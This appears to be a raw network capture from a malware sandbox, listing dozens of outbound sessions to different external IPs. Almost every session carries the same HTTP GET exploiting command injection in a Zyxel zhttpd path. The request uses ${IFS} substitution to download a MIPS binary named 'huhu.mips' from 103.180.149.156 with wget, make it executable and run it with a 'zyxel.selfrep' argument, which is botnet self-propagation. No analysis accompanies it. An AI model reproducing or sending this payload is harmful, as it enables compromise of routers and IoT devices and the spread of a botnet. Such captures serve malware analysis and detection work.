                                                      Feb 2, 2024 06:35:58.748655081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5719192.168.2.1457996129.233.99.208443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.748678923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5720192.168.2.1451382157.116.246.78443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.748711109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5721192.168.2.145901258.243.173.211443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.748749971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5722192.168.2.1437050164.231.83.3443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.748804092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5723192.168.2.145162489.210.33.128443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.748835087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5724192.168.2.1440296144.179.86.113443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.748867989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5725192.168.2.143886253.193.166.141443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.748895884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5726192.168.2.1460016135.134.167.193443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.748933077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5727192.168.2.1448872108.238.247.120443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.748971939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5728192.168.2.1437680170.173.14.75443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.749018908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5729192.168.2.1460704158.3.65.106443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.749042034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5730192.168.2.144501670.38.53.10443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.749105930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5731192.168.2.1451540117.132.34.216443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.749147892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5732192.168.2.1460634115.28.185.49443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.749197006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5733192.168.2.1436544103.157.18.206443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.749226093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5734192.168.2.1440098163.112.216.118443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.749278069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5735192.168.2.143806269.50.247.222443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.749322891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5736192.168.2.1457904129.116.222.158443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.749350071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5737192.168.2.1436228181.84.241.175443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.749392033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5738192.168.2.1434632154.210.155.38443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.749423027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5739192.168.2.145728876.234.154.28443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.749458075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5740192.168.2.145179444.54.224.206443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.749484062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5741192.168.2.1450874151.178.60.249443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.749553919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5742192.168.2.1435304180.51.253.40443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.749670029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5743192.168.2.1434632128.97.47.154443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.749700069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5744192.168.2.144794627.150.215.169443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.749747038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5745192.168.2.144570224.66.149.72443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.749788046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5746192.168.2.1433206178.65.159.224443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.749814987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5747192.168.2.143964482.68.46.164443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.749845982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5748192.168.2.1438280193.147.241.19443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.749869108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5749192.168.2.145787264.127.244.169443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.749913931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5750192.168.2.143588296.193.54.225443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.749963045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5751192.168.2.1450996168.110.76.169443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.749995947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5752192.168.2.1433246216.11.147.112443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.750015974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5753192.168.2.1458744190.220.133.169443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.750060081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5754192.168.2.1439796154.216.168.18443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.750097036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5755192.168.2.1444704131.186.111.59443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.750143051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5756192.168.2.1457594120.213.134.166443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.750175953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5757192.168.2.1438338181.187.42.175443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.750219107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5758192.168.2.143585644.175.118.183443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.750253916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5759192.168.2.144938692.200.135.39443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.750283957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5760192.168.2.1459052189.246.51.27443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.750344038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5761192.168.2.1434110131.215.17.105443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.750344038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5762192.168.2.145085248.156.23.122443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.750375986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5763192.168.2.1453628101.65.118.24443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.750439882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5764192.168.2.145723842.160.247.32443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.750494003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5765192.168.2.143915065.7.161.248443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.750521898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5766192.168.2.1453948103.182.217.86443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.750569105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5767192.168.2.1450758132.226.156.41443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.750619888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5768192.168.2.1452424131.0.207.236443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.750668049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5769192.168.2.1446082163.19.115.64443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.750700951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5770192.168.2.143442442.56.198.84443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.750740051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5771192.168.2.1455880153.116.201.194443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.750781059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5772192.168.2.1443598123.253.160.168443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.750824928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5773192.168.2.14496984.60.205.173443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.750866890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5774192.168.2.145109238.116.28.87443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.750895023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5775192.168.2.1454844158.82.140.248443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.750935078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5776192.168.2.1454046197.180.243.117443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.750962019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5777192.168.2.145630496.85.121.132443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.750998974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5778192.168.2.145039092.93.129.127443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.751034975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5779192.168.2.145652253.169.67.240443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.751089096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5780192.168.2.144427643.31.148.92443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.751116037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5781192.168.2.1435770207.236.37.246443
                                                      TimestampBytes transferredDirectionData
